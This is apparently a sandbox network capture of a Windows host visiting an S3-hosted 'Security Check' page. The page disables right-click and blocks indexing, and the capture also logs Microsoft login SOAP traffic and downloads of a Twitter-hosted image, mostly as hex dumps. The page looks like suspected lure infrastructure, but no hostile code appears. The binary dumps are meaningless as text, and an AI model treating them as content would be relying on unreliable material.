                                                                                                                              Date: Fri, 04 Oct 2024 13:10:49 GMT
                                                                                                                              Last-Modified: Tue, 01 Oct 2024 10:32:48 GMT
                                                                                                                              ETag: "e7cc921cd33185fd7a332d7dd710c0a3"
                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Type: text/html
                                                                                                                              Server: AmazonS3
                                                                                                                              Content-Length: 3321
                                                                                                                              Connection: close
                                                                                                                              2024-10-04 13:10:48 UTC1531INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 65 63 75 72 69 74 79 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74
                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Security Check</title> <meta name="robots" content="noindex, nofollow, noarchive"> <met
                                                                                                                              2024-10-04 13:10:48 UTC1790INData Raw: 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 25 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 6f 6e 63 6f 6e 74 65 78 74 6d 65 6e 75 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 62 73 2e 74 77 69 6d 67 2e 63 6f 6d 2f 6d 65 64 69 61 2f 47 47 72
                                                                                                                              Data Ascii: left: 50%; transform: translateX(-50%); } </style></head><body oncontextmenu="return false;"> <div class="container"> <div class="image-container"> <img src="https://pbs.twimg.com/media/GGr


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.174972120.190.159.2443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:49 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 4742
                                                                                                                              Host: login.live.com
                                                                                                                              2024-10-04 13:10:49 UTC4742OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-10-04 13:10:49 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Fri, 04 Oct 2024 13:09:49 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BL2
                                                                                                                              x-ms-request-id: b697132e-bc99-482e-9fed-e2d5b0a20787
                                                                                                                              PPServer: PPV: 30 H: BL02EPF0001D878 V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:49 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 10197
                                                                                                                              2024-10-04 13:10:49 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.1749722146.75.52.1594432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:49 UTC626OUTGET /media/GGrR89_WgAAgrOI?format=jpg&name=large HTTP/1.1
                                                                                                                              Host: pbs.twimg.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://crewbloom.s3.amazonaws.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:10:49 UTC742INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 39755
                                                                                                                              perf: 7402827104
                                                                                                                              cache-tag: media,media/bucket/3,media/1759449449804234752
                                                                                                                              content-type: image/jpeg
                                                                                                                              cache-control: max-age=604800, must-revalidate
                                                                                                                              last-modified: Mon, 19 Feb 2024 05:24:52 GMT
                                                                                                                              x-transaction-id: 5080376a38065880
                                                                                                                              timing-allow-origin: https://twitter.com, https://mobile.twitter.com
                                                                                                                              strict-transport-security: max-age=631138519
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-expose-headers: Content-Length
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:49 GMT
                                                                                                                              X-Cache: HIT, HIT
                                                                                                                              x-tw-cdn: FT
                                                                                                                              x-served-by: cache-lhr-egll1980036-LHR, cache-lin1730075-LIN, cache-tw-ZZZ1
                                                                                                                              Server-Timing: x-cache;desc=HIT, x-tw-cdn;desc=FT
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c2 00 11 08 02 76 07 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 07 01 04 03 02 08 ff c4 00 1b 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 06 02 04 05 01 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 d9 40 00 00 00
                                                                                                                              Data Ascii: JFIFC!"$"$Cv0"@
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: 2c 39 d2 7f 38 0e f0 3b ce f0 3a 39 d0 38 3b c0 eb 83 bc e8 e1 d3 8e f0 e9 c1 de 07 41 ce f0 03 a0 71 d3 80 eb 80 74 e1 d3 9d e7 47 00 ef 0e 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 1b 25 1b 24 79 c1 cb 25 6f a0 00 04 ec 14 ec 13 5b 2b 96 3a ef ce 6e dc 1c bd a0 00 02 5e 6e 12 6e d3 c9 3a e8 6b f1 d1 cf c7 e3 2a 2f 1e 1a 17 b0 bd 4f e3 97 d2 de e8 e3 bc 3b c0 3a 1c 74 e7 79 d3 8e 80 39 d0 e7 43 8e f0 3b c2 13 c9 53 8a 36 73 cc 7a 7b 48 b4 9e de 87 3a 1c 74 73 bc e9 c7 78 77 9d 1c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Data Ascii: ,98;:98;AqtG%$y%o[+:n^nn:k*/O;:ty9C;S6sz{H:tsxwt
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Data Ascii:
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: 00 00 00 00 67 f5 6b 4d 58 d7 72 6d 97 05 36 ea 35 ce 00 f0 5e 32 ab 89 0a 83 d5 8f 16 41 b0 51 08 bd 52 af 7b 00 ae d7 7f 36 e2 81 a6 66 36 22 ee 08 7c e3 5f fe 70 34 fa ae b9 4d 24 2a 7f 3d 80 cb f5 0f e7 4f e8 52 0a bb 41 fe 83 32 9b df 70 b3 76 ce 35 ff 00 e7 03 4f aa eb 94 d2 42 a7 f3 d8 0c bf 50 fe 74 fe 81 20 60 69 da 11 5c d3 f0 5d 28 85 fb f8 a4 ca e5 d6 77 1c 36 0f e7 df e9 cf e7 13 51 be 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 e7 9e ad 68 86 35 ac 17 7a c2 0d 96 02 4e b4 42 eb 59 0d dc a2 56 f7 ea 71 65 a1 f3 f6 4b 5e e8 17 73 d0 0a f5 4e 9d b1 99 cd 9a bd 3c 5f 80 fe 73 fe 8c fe 73 3f
                                                                                                                              Data Ascii: gkMXrm65^2AQR{6f6"|_p4M$*=ORA2pv5OBPt `i\](w6Q(h5zNBYVqeK^sN<_ss?
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f ff c4 00 35 10 00 02 02 01 02 04 05 03 03 03 04 02 03 00 00 00 04 05 02 03 01 00 06 14 15 34 35 10 11 12 13 30 20 33 70 21 32 36 16 31 40 22 24 25 60 50 80 90 a0 c0 ff da 00 08 01 01 00 01 05 02 ff 00 dd 3b ac 8d 35 73 60 b5 cd 82
                                                                                                                              Data Ascii: 5450 3p!261@"$%`P;5s`
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: 87 3e 78 45 7e 87 47 44 33 ab 52 55 65 ab 96 c0 3b 7c 4c 52 2d f9 92 1b 75 14 36 e8 45 22 d1 9d 67 1e 78 bd 15 59 d6 51 5f aa 50 fe a2 8d 48 d0 f0 2d 38 d7 66 48 6e d4 10 d9 e6 1a b1 47 cf 83 15 b0 32 ea 92 55 5d 9e 06 89 49 75 d8 86 cf 3a 90 cf ce b8 fa 2b fc 30 65 59 bc 6e 49 6e b9 25 ba e4 96 eb 92 5b ae 49 6e b9 25 ba e4 96 eb 92 5b ae 49 6e 96 ad 98 a4 9b 4e 6f a3 95 59 ae 55 66 b9 55 9a e5 56 6b 95 59 ae 55 66 b9 55 9a e5 56 6b 95 59 a5 e2 48 69 7e 50 22 cc 53 4f 37 ab 5c e2 ad 73 7a b5 cd ea d7 37 ab 5c de ad 73 8a b5 cd ea d7 37 ab 42 30 81 37 5d 66 2a 87 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 51 7e 2e cf e5 06 7d 07 c2 8f ae 3f a7 f8 56 fe ef aa 72 8c 23 73 91 21 9e 7d 56 ab 76 2c b4 3d f5 11 0f f2 18 b2 a8 3c 84 e2 ab
                                                                                                                              Data Ascii: >xE~GD3RUe;|LR-u6E"gxYQ_PH-8fHnG2U]Iu:+0eYnIn%[In%[InNoYUfUVkYUfUVkYHi~P"SO7\sz7\s7B07]f*qqqqQ~.}?Vr#s!}Vv,=<
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: 95 6e 5e 67 92 36 f4 dd 44 25 99 33 22 78 3c 6b 52 ca 40 cb d6 74 16 c9 ca 72 c2 22 b2 c5 f0 66 c2 95 f0 27 74 93 6d a7 bf b6 76 c9 fb 91 6f fe a0 0f 0b 0b 72 f6 51 45 b8 ee b8 ad 3a 6e 3a c8 0d 76 e3 61 59 2d 9d ab bd 43 31 d9 52 cd 85 2b e0 4e e9 26 db 4f 7f 6c ed 93 f7 22 df fd 40 1e 16 16 e5 ec a2 8b 71 dd 71 5a 74 e2 b0 33 64 b7 54 e0 06 e6 22 ab e5 74 38 66 3b 9c 88 48 5d c5 98 2b 31 c3 fa b3 b6 dc e5 8e 1c 48 fc 08 44 6d 89 34 d9 b9 fd ef c6 3b eb b5 ec 7e ef ad d9 df d5 76 bd e3 d8 f6 27 59 bb 71 3c a2 da 6d e9 0e 37 c2 a2 c4 4a 35 82 2c df da d8 fd a3 c7 75 28 30 e2 92 8b 30 d5 ef 8b e8 b7 3b 2a 5e a4 de 2d e3 88 b6 04 4a 02 1f 7c 53 19 2e d9 02 d1 79 1a 6b 0c 0a e2 eb 23 55 02 fa 9a bd c7 e9 a7 41 e0 e5 aa 0b 98 2c 34 de 38 8b 60 44 a0 21 f7 c5
                                                                                                                              Data Ascii: n^g6D%3"x<kR@tr"f'tmvorQE:n:vaY-C1R+N&Ol"@qqZt3dT"t8f;H]+1HDm4;~v'Yq<m7J5,u(00;*^-J|S.yk#UA,48`D!
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: 9f 16 dd b4 41 b4 57 57 60 d1 58 fb ed cf 63 c2 b0 62 f7 01 b0 93 7e 1d 56 5e 95 4e 2a b2 16 d5 ff 00 71 62 1d 67 6e e8 ed 75 d8 96 e8 ae 14 ed c7 1e ee 66 7d 0f 6c 0e eb a2 02 07 10 77 95 78 a4 62 36 a5 b8 7c b8 67 b7 e0 b0 8a a5 fc c5 db 34 e6 85 3b 82 91 88 5f 6e 1f 2e 19 f1 15 95 b5 5f 17 01 c1 71 07 79 56 77 f0 75 f0 8e 14 57 99 7f 47 03 ed f0 1b 2f d3 ec b6 ed 5b 47 d1 c8 97 e2 39 de 21 93 c9 f5 b5 85 e1 93 eb 76 0f ef a6 cf fc e9 81 dd cc a6 da 38 96 ec de bd 99 bf 75 af f9 b2 58 b3 99 d7 8a c2 6d f4 ce cc 2c dc a3 53 c0 d4 ab d5 70 5b 72 0e 32 b1 58 a4 c3 71 68 42 8f 38 85 b1 22 1b b9 14 71 fd 46 db 05 4b 77 38 19 c5 c1 01 1c c0 1d d7 fa b1 63 91 70 13 6c 0f 36 3b bb b0 b7 f7 65 23 e8 7b 60 65 d5 ed d2 c7 22 e0 27 f8 f5 93 b6 b3 cb 9a 5f fc d9 6c
                                                                                                                              Data Ascii: AWW`Xcb~V^N*qbgnuf}lwxb6|g4;_n._qyVwuWG/[G9!v8uXm,Sp[r2XqhB8"qFKw8cpl6;e#{`e"'_l
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: fd 7f 9a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 33 f4 6c 8c c5 f9 1c c5 f9 1c c5 f9 1c c5 f9 1c c2 cf 69 34 99 91 08 83 92 ab 2b 69 82 18 5b c6 43 0b 78 c8 61 6f 19 0c 2d e3 20 e2 93 49 22 4c b5 fb fe 9f 3f ff c4 00 4f 10 00 01 02 03 03 07 06 0c 03 05 05 06 07 00 00 00 01 02 03 00 04 11 12 21 31 05 10 13 22 32 41 71 33 42 51 61 72 91 14 20 23 30 52 70 73 81 82 a1 b1 c1 62 92 d1 15 34 40 43 f0 63 83 b2 c2 e1 24 50 60 74 a2 f1 53 80 90 a0 a3 c0 d2 ff da 00 08 01 01 00 06 3f 02 ff 00 ce 99 71 7b 23 18 e5 15 f9 63 94 57 e5 8e 51 5f 96 39 43 f9 63 94 57 e5 8e 51 5f 96 39 45 7e 58 e5 0f e5 8e 51 5f 96 34 6d 28 95 70 8b 6b 34 11 b6
                                                                                                                              Data Ascii: IXgZIXgZIXgZIXgZ3li4+i[Cxao- I"L?O!1"2Aq3BQar #0Rpsb4@Cc$P`tS?q{#cWQ_9CcWQ_9E~XQ_4m(pk4
                                                                                                                              2024-10-04 13:10:49 UTC1379INData Raw: 43 dd b3 0b ec 67 33 4c 8a fa 63 ef 9a c8 72 d0 fc 57 c5 2d 25 1d 91 15 30 26 9e 14 03 60 42 fb 26 3c 8b 85 3d 51 7a 1a 3e e8 1a 52 28 30 02 12 d2 07 13 d1 01 23 00 29 06 69 a1 54 1d a1 d1 9a cd b0 b1 f8 84 59 b6 10 3f 08 cd e1 4f 0a 1e 60 fb e6 47 62 1a ed 8c ee 5d 72 8d a1 01 c6 d5 65 42 2c da 40 eb 09 86 c9 bc 94 8f 53 2f 70 f3 5f 09 83 c4 79 a7 38 78 ca 64 aa c8 3b e3 97 5f 74 21 a0 6b 64 53 32 da 56 0a 14 8e 5d 7d d0 12 9c 00 a6 6d 12 94 53 7d 6e 8e 5d 7d d0 86 41 a8 4e f8 0d a9 65 34 35 ba 39 75 f7 42 51 e8 8a 66 f2 a8 bf d2 18 c7 92 7c 53 f1 08 bd e6 e2 af 2c b9 d5 80 cc a5 e9 d7 ac 6b 84 17 12 e2 95 51 4b c7 89 68 55 a5 74 a6 35 5f 41 e2 23 59 f4 0e 02 2d 2a ae ab f1 66 20 ef 8a b2 f2 93 d4 6f 8e 59 b8 f2 cf fe 51 16 19 45 9f be 7b 48 ab 4a ea c2
                                                                                                                              Data Ascii: Cg3LcrW-%0&`B&<=Qz>R(0#)iTY?O`Gb]reB,@S/p_y8xd;_t!kdS2V]}mS}n]}ANe459uBQf|S,kQKhUt5_A#Y-*f oYQE{HJ


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.1749724146.75.52.1594432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:51 UTC380OUTGET /media/GGrR89_WgAAgrOI?format=jpg&name=large HTTP/1.1
                                                                                                                              Host: pbs.twimg.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:10:52 UTC742INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 39755
                                                                                                                              perf: 7402827104
                                                                                                                              cache-tag: media,media/bucket/3,media/1759449449804234752
                                                                                                                              content-type: image/jpeg
                                                                                                                              cache-control: max-age=604800, must-revalidate
                                                                                                                              last-modified: Mon, 19 Feb 2024 05:24:52 GMT
                                                                                                                              x-transaction-id: 5080376a38065880
                                                                                                                              timing-allow-origin: https://twitter.com, https://mobile.twitter.com
                                                                                                                              strict-transport-security: max-age=631138519
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-expose-headers: Content-Length
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:52 GMT
                                                                                                                              X-Cache: HIT, HIT
                                                                                                                              x-tw-cdn: FT
                                                                                                                              x-served-by: cache-lhr-egll1980036-LHR, cache-lin1730037-LIN, cache-tw-ZZZ1
                                                                                                                              Server-Timing: x-cache;desc=HIT, x-tw-cdn;desc=FT
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c2 00 11 08 02 76 07 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 07 01 04 03 02 08 ff c4 00 1b 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 06 02 04 05 01 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 d9 40 00 00 00
                                                                                                                              Data Ascii: JFIFC!"$"$Cv0"@
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: 2c 39 d2 7f 38 0e f0 3b ce f0 3a 39 d0 38 3b c0 eb 83 bc e8 e1 d3 8e f0 e9 c1 de 07 41 ce f0 03 a0 71 d3 80 eb 80 74 e1 d3 9d e7 47 00 ef 0e 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 1b 25 1b 24 79 c1 cb 25 6f a0 00 04 ec 14 ec 13 5b 2b 96 3a ef ce 6e dc 1c bd a0 00 02 5e 6e 12 6e d3 c9 3a e8 6b f1 d1 cf c7 e3 2a 2f 1e 1a 17 b0 bd 4f e3 97 d2 de e8 e3 bc 3b c0 3a 1c 74 e7 79 d3 8e 80 39 d0 e7 43 8e f0 3b c2 13 c9 53 8a 36 73 cc 7a 7b 48 b4 9e de 87 3a 1c 74 73 bc e9 c7 78 77 9d 1c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Data Ascii: ,98;:98;AqtG%$y%o[+:n^nn:k*/O;:ty9C;S6sz{H:tsxwt
